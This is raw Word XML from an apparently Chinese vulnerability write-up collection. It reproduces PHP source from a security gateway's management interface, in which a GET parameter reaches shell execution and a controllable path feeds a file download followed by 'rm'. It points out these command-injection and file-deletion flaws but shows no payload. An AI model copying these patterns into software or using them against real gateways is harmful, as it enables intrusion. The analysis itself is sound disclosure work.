                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> "Content-type: application/octet-stream ");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="4167"/>
                    </w:tabs>
                    <w:spacing w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="1095" w:right="1493"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>Header(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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"Accept-Ranges:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>bytes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");</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="99"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>Header(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"Accept-Length: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".</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>filesize(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$upload_dir.$upload_file));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9807" type="#_x0000_t202" style="width:337.5pt;height:148.6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tabs>
                      <w:tab w:val="left" w:pos="4889"/>
                    </w:tabs>
                    <w:spacing w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="528" w:firstLine="914"/>
                  </w:pPr>
                  <w:bookmarkStart w:id="42" w:name="上海格尔安全认证网关管理系统命令执行"/>
                  <w:bookmarkStart w:id="43" w:name="_bookmark20"/>
                  <w:bookmarkEnd w:id="42"/>
                  <w:bookmarkEnd w:id="43"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>Header(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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"Content-Disposition:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>attachment; filename=".$upload_file);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50" w:firstLine="914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color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>fread($fp,filesize($upload_dir.$upload_file));</w:t>
                  </w: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fclose(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$fp);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>"rm ".$upload_dir.$upload_file);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exit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a3"/>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-85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upload_dir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可控，而且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>还进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>行了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过滤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，但是不影响</w:t>
      </w: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spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="326" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上海格尔安全认证网关管理系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="313"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>作者：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>xfkxfk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9806" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:16.35pt;width:337.5pt;height:197.55pt;z-index:404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 w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="1095" w:right="694"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>include_once "</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>..</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/global/common.php"; include_once "</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>..</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/ssl/service_helper.php";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2012"/>
                      <w:tab w:val="left" w:pos="3843"/>
                    </w:tabs>
                    <w:spacing w:line="215" w:lineRule="exact"/>
                    <w:ind w:left="1095" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/*</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>处理</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-49"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>GET</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-72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请求</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>*/</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112" w:line="388" w:lineRule="auto"/>
                    <w:ind w:left="1095" w:right="1055"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$service_path = $_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>GET[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'service_path'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>]; switch( $_GET['service_action'] )</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="1095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'start':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355" w:firstLine="274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 true == start_service($service_path) ) {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$retry_limit = 10;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文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>/kssl/kssl/WEBUI/www/api/service.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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9805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ind w:left="3843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$state_expected = '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>已启</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="48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动</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="3843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LOG_INFO, "</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>启动代理服务</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$service_path"."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</w:rPr>
                    <w:t>成功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9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LOG_INFO, "</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62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启动代理服务</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$service_path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 xml:space="preserve"> $service_path != "" &amp;&amp;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 xml:space="preserve">$retry_limit &gt; </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>0 )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$state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status_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>service(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$service_path);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="4760"/>
                    </w:tabs>
                    <w:spacing w:before="62"/>
                    <w:ind w:left="3843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/*</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:tab/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如果</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-51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HRP</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-73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状态达到</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2928"/>
                    </w:tabs>
                    <w:spacing w:before="50"/>
                    <w:ind w:left="180" w:right="50"/>
                    <w:rPr>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pP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了期望值，则中止重试操作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ab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>*/</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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 xml:space="preserve"> $state ==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$state_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>expected )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126"/>
                    <w:ind w:right="1260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break</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95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124"/>
                    <w:ind w:right="900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sleep(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>1);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908" w:right="3655"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$retry_limit--;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6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4"/>
                    <w:ind w:right="2598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'stop':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355" w:firstLine="274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 true == stop_service($service_path) ) {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$retry_limit = 10;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62"/>
                    <w:ind w:left="3843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$state_expected = '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>已停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止</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>';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9804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LOG_INFO, "</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>停止代理服务</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$service_path"."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</w:rPr>
                    <w:t>成功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9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LOG_INFO, "</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65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停止代理服务</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$service_path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 xml:space="preserve"> $service_path != "" &amp;&amp;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 xml:space="preserve">$retry_limit &gt; </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>0 )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$state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status_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>service(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$service_path);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="4760"/>
                    </w:tabs>
                    <w:spacing w:before="65"/>
                    <w:ind w:left="3843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/*</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:tab/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如果</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-51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HRP</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-73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状态达到</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2928"/>
                    </w:tabs>
                    <w:spacing w:before="50"/>
                    <w:ind w:left="180" w:right="50"/>
                    <w:rPr>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pP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了期望值，则中止重试操作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ab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>*/</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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 xml:space="preserve"> $state ==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$state_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>expected )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126"/>
                    <w:ind w:right="1260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break</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95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126"/>
                    <w:ind w:right="900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sleep(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>1);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908" w:right="3655"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$retry_limit--;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6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right="2598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'download': {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2837" w:firstLine="2748"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$proxy = get_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>proxy(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$service_path);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2928" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$usermap_url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proxy[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'usermap_url'];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 w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="50" w:firstLine="914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 xml:space="preserve"> WEBUI_exec(</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-88"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"$SSL_DIR/bin/hrp-download-use rmap.sh $SSL_DIR/cfg/$service_path", true ) ) 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9803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LOG_INFO, "</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62" w:line="283" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/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从</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$usermap_url"."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下载代理服务</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$service_path"."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的用户映射策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略成功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73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9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65"/>
                    <w:ind w:left="3843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LOG_ERR, "</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>从</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="50" w:line="280" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$usermap_url"."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下载代理服务</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$service_path"."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的用户映射策略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失败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75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2928" w:right="307"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$acl_url = $</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>proxy[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'acl_url']; echo "&lt;script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language</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>='JavaScript'&gt;";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 w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="50" w:firstLine="914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 xml:space="preserve"> WEBUI_exec(</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-89"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">"$SSL_DIR/bin/hrp-download-acl. sh $SSL_DIR/cfg/$service_path", </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>true )</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> ) {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LOG_INFO, "</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65"/>
                    <w:ind w:left="180" w:right="50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rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>从</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$acl_url"."</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>下载代理服务</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$service_path"."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</w:rPr>
                    <w:t>的</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-56"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ACL</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-79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策略成功</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>" );</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62"/>
                    <w:ind w:left="3843" w:right="50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"window.alert(\"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>激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活策略成功</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>\");</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>";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9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65"/>
                    <w:ind w:left="3843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log(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> LOG_ERR, "</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>从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$acl_url"."</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>下载代理服务</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$service_path"."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</w:rPr>
                    <w:t>的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ACL</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
